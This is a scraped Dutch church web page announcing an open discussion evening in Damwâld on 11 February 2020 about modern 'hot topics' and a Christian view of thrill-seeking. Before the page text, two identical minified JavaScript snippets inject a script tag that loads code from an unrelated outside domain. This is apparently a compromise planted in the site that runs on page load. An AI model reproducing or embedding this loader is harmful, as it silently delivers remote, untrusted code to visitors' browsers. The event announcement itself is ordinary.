;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Open gespreksavond over 'hete hangijzers' - PKN Damwâld
11 februari 2020
20:00 t/m 21:00
de Ontmoeting
Open gespreksavond over ‘hete hangijzers’

Op 19 november hielden we de eerste open avond van dit seizoen. Op die avonden proberen we te kijken naar wat in onze tijd ‘hot’ is en de mensen bezighoudt, om het te leggen naast wat de Bijbel ons leert over het goede leven. De eerste avond ging over leiderschap: hoe gaan regeerders om met ons, en hoe staan wij tegenover onze regeerders. We merkten hoe de Bijbel daar best een heel ander geluid laat horen dan we gewend zijn – het zette ons aan het denken.

In de vorige Paadwizer heb ik de datum voor deze bijeenkomst al vermeld: dinsdag 11 februari om 20 uur in “De Ontmoeting”. Toen ik dit idee bedacht, had ik er geen vermoeden van hoeveel keuzemogelijkheden er in onze tijd zijn voor een thema. Er is heel veel aan de hand vandaag de dag: Australië brandt; in en rond Iran klinkt oorlogstaal; maar ook in ons land is er van alles gaande in de omgang onder elkaar. We hebben als de politiek zijn zin krijgt voor het laatst met zijn allen vuurwerk kunnen afsteken, omdat men breed het niet langer verantwoord vindt. En dat ligt niet alleen aan het gevaarlijker worden van knallers en vuurpijlen. Er is iets veranderd in de mensen die het afsteken. Ze gaan zich steeds extremer gedragen: het moet groter, het moet spannender, en men zoekt de randen op van wat kan en niet kan. Zelfs voor (helpende!) medeburgers verliest men het oog.

Op de komende Open Avond wil ik het gaan hebben over wat daarachter zit. Hoe komt het dat de mentaliteit verandert? En hebben wij als christenen een boodschap aan het ongeremd zoeken van genot en sensatie?

Op 11 februari gaan we het erover hebben. Wilt u erbij zijn? U bent van harte welkom. Iedereen die belangstelling heeft is van harte welkom, want de avonden staan op zichzelf.

Locatie: de OntmoetingFoarwei 38, 9104 BX Damwâld